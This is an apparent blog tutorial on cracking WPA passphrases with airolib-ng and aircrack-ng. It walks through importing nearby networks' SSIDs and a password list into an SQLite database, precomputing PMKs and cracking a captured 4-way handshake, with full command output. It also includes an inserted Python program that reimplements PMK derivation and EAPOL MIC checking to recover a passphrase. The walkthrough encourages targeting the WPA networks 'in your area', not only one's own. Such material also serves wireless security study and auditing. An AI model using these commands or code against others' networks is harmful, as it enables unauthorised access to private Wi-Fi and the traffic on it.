Friday, February 19, 2010

Airolib-ng WPA cracking walk through

I used to crack WPA passphrases with coWPAtty's precomputed hash tables, but another way to crack WPA with precomputed values is to build airolib-ng databases from lists of SSIDs and passwords. airolib-ng stores these in an SQLite3 database, which is convenient because one database can hold more than one SSID list and password list. If you are in an area with several WPA networks, note all of their SSIDs in a list and import them into the database. Because the PMK is derived from the passphrase salted with the SSID, a table built for every nearby SSID lets you attack any of the captured 4-way handshakes with the same database file. Below is a play-by-play of cracking a WPA network using the airolib-ng/aircrack-ng method.
Note: I assume you already have a packet capture containing a handshake. If not, run airodump-ng on the target channel until it reports one; for practice you can simply reconnect your own client (turn its wireless card off and on) while airodump-ng is capturing on that channel. I also assume you know the old way of cracking WPA with a plain wordlist; if not, I can post a guide on that.

Setting up the databases:
First you need to create an SQLite3 database and import some SSIDs into it. If the database does not exist yet, airolib-ng creates it for you. Build a list of SSIDs, one per line, from your airodump-ng output, then run airolib-ng in the following format (the first argument is always the database file):

airolib-ng <database> --import essid <ssid-list>

Create SSID list:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --import essid ssidlist.txt
Database does not already exist, creating it...
Database successfully created
Reading file...
Writing...
Done.

Next, import your password list (one candidate passphrase per line) into the same database. The format is the same as for the SSIDs, with the keyword changed to passwd and the password list as the file. Here is the format, followed by an example.

airolib-ng <database> --import passwd <password-list>

Create Password List:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --import passwd passwords.txt
Reading file...
Writing...
Done.
The next command is optional. "clean" runs integrity checks on the database, drops invalid entries and unreferenced PMKs, and shrinks the file where possible.

Clean Database:
Example:
root@ficti0n:~# airolib-ng wpaDatabase --clean all
Deleting invalid ESSIDs and passwords...
Deleting unreferenced PMKs...
Analysing index structure...
Vacuum-cleaning the database. This could take a while...
Checking database integrity...
integrity_check
ok
Query done. 2 rows affected.
Done.

Create your PMK’s:
After you have imported all your SSIDs and passwords, compute the PMK hashes with --batch. This is the expensive step (4096 rounds of PBKDF2-HMAC-SHA1 for every SSID/password pair), so it takes a while on large lists; the example below has only 21 pairs, which is why it finishes instantly.

root@ficti0n:~# airolib-ng wpaDatabase --batch
Computed 21 PMK in 0 seconds (21 PMK/s, 0 in buffer). All ESSID processed.

Cracking:
Now that the database holds PMKs for the WPA SSIDs in your area, run aircrack-ng against your capture file with -r pointing at the database. If all goes well and the network's passphrase is in your list, you are done. Note that the ESSID in the capture must match an ESSID in the database exactly (case and whitespace included), since the PMKs were computed with that string as the salt.

Example:
root@ficti0n:~# aircrack-ng -r wpaDatabase Output-02.cap
Opening Output-02.cap
Read 3347 packets.

   #  BSSID              ESSID                     Encryption

   1  00:18:F8:66:7E:CC  ficti0nAP                 WPA (1 handshake)
Choosing first network as target.
Opening Output-02.cap
                                 Aircrack-ng 1.0 r1645
                   [00:00:00] 1 keys tested (240.91 k/s)
                         KEY FOUND! [ MyPassword ] 
      Master Key     : 81 91 38 43 93 E5 28 6C 38 3F 3A 79 88 06 53 80
                       67 D5 24 01 6B BD 44 E6 5B D3 78 92 CE 85 66 60
      Transient Key  : A1 91 0B E1 2D 1C D9 31 73 A1 2B 7B 51 4E E6 C0
                       FE A9 61 49 0E B1 0B 19 76 D6 54 9D A4 4B 7B E3
                       00 05 DB 2B 90 0E DF DB F7 AB D2 53 26 6C E5 C9
                       1B 4B 73 1D 9D 94 15 9D 1E 51 79 94 F8 64 97 67
      EAPOL HMAC     : 15 55 71 33 DB A8 2C 6F 82 74 1E BF 70 72 1B F0
Quitting aircrack-ng...
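To make clear what the --batch step above precomputes and what aircrack-ng then checks against the handshake, here is an added example in plain Python. It is not code from the original post or from the aircrack-ng project. It builds a small PMK table keyed by ESSID (a simplified, assumed schema, not airolib-ng's real one), derives the PTK from a handshake, and compares the EAPOL MIC for each candidate. The BSSID 00:18:F8:66:7E:CC and the network name ficti0nAP come from the post; the station MAC, nonces and EAPOL frame bytes are constructed for the example, and the MIC is assumed to be the WPA2/AES form (HMAC-SHA1, key descriptor version 2). The two PBKDF2 test vectors are the published IEEE 802.11i ones.

```python
# Added example (not from the original post or from aircrack-ng): what airolib-ng
# precomputes (PMKs per ESSID) and what aircrack-ng checks against a captured
# 4-way handshake (the EAPOL MIC), written out in plain Python.
import hashlib
import hmac
import sqlite3


def pmk(passphrase: str, essid: str) -> bytes:
    """WPA-PSK master key: PBKDF2-HMAC-SHA1(passphrase, essid, 4096 rounds, 32 bytes).
    The ESSID is the salt, which is why a PMK table only applies to that one ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid.encode(), 4096, 32)


def build_db(essids, passwords):
    """Precompute one PMK per (essid, password) pair, like airolib-ng --batch.
    The schema is a simplification assumed for this example, not airolib-ng's own."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE essid (essid TEXT PRIMARY KEY, prio INTEGER NOT NULL DEFAULT 64);
        CREATE TABLE pmk (essid TEXT, passwd TEXT, pmk BLOB);
    """)
    db.executemany("INSERT INTO essid (essid) VALUES (?)", [(e,) for e in essids])
    db.executemany("INSERT INTO pmk VALUES (?, ?, ?)",
                   [(e, p, pmk(p, e)) for e in essids for p in passwords])
    db.commit()
    return db


def prf512(pmk_bytes, aa, spa, anonce, snonce):
    """IEEE 802.11i PRF-512: the 64-byte PTK from PMK, both MAC addresses and both nonces."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk_bytes, b"Pairwise key expansion\x00" + data + bytes([i]),
                 hashlib.sha1).digest()
        for i in range(4))
    return out[:64]


def eapol_mic(pmk_bytes, aa, spa, anonce, snonce, eapol_mic_zeroed):
    """MIC over the EAPOL-Key frame (its 16-byte MIC field zeroed) under KCK = PTK[0:16].
    HMAC-SHA1 truncated to 16 bytes is the WPA2/AES (key descriptor version 2) case;
    WPA/TKIP uses HMAC-MD5 instead. Version 2 is assumed throughout this example."""
    kck = prf512(pmk_bytes, aa, spa, anonce, snonce)[:16]
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def crack(db, essid, aa, spa, anonce, snonce, eapol_mic_zeroed, captured_mic):
    """Try every precomputed PMK for this ESSID; the candidate whose KCK reproduces the
    captured MIC is the passphrase. No PBKDF2 runs here: that is the point of the table."""
    rows = db.execute("SELECT passwd, pmk FROM pmk WHERE essid = ?", (essid,))
    for passwd, pmk_bytes in rows:
        mic = eapol_mic(pmk_bytes, aa, spa, anonce, snonce, eapol_mic_zeroed)
        if hmac.compare_digest(mic, captured_mic):
            return passwd
    return None


# Constructed handshake for the post's network. Only the BSSID and ESSID are from
# the post; the station MAC, nonces and frame bytes are invented for the example.
AA = bytes.fromhex("0018f8667ecc")        # AP BSSID shown in the aircrack-ng output
SPA = bytes.fromhex("001122334455")       # station MAC (assumed)
ANONCE = bytes(range(32))                 # real nonces are random; fixed here
SNONCE = bytes(range(32, 64))
EAPOL = bytes.fromhex("0203") + bytes(97)  # stand-in EAPOL-Key frame, MIC field zeroed
# "Capture" the MIC the client would have sent with the real passphrase.
CAPTURED_MIC = eapol_mic(pmk("MyPassword", "ficti0nAP"), AA, SPA, ANONCE, SNONCE, EAPOL)


def demo():
    """Build a tiny table for two nearby ESSIDs and recover the post's passphrase."""
    db = build_db(["ficti0nAP", "OtherAP"], ["password", "letmein", "MyPassword"])
    return crack(db, "ficti0nAP", AA, SPA, ANONCE, SNONCE, EAPOL, CAPTURED_MIC)


if __name__ == "__main__":
    print("KEY FOUND! [", demo(), "]")
```

Running the same crack() against the "OtherAP" rows returns None even though "MyPassword" is in the list, because those PMKs were salted with a different ESSID; that is the practical reason the ESSID list has to match the networks you captured.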

Optional:
Another useful option: if you want to crack all the WPA networks in the capture but want a specific network's PMKs computed first, set that ESSID's priority in the database with --sql. airolib-ng processes ESSIDs in ascending prio order, so giving your target a value one below the current minimum moves it to the front of the queue. One caveat on quoting: SQLite only accepts the double-quoted "ficti0nAP" as a string because no column of that name exists; single quotes are the proper string syntax, so use them if you run the statement from somewhere other than this shell command line. Try the following command to prioritise your network.
root@ficti0n:~#  airolib-ng wpaDatabase --sql 'update essid set prio=(select min(prio)-1 from essid) where essid="ficti0nAP";'
Query done. 1 rows affected.



1 comment:

  1. Thanks ! Very easy and 100 % Working.

    Just add a command to help while creating text file containing ESSIDs.
    for example:
    echo [AccessPoint Name or BSSID] > filename.txt
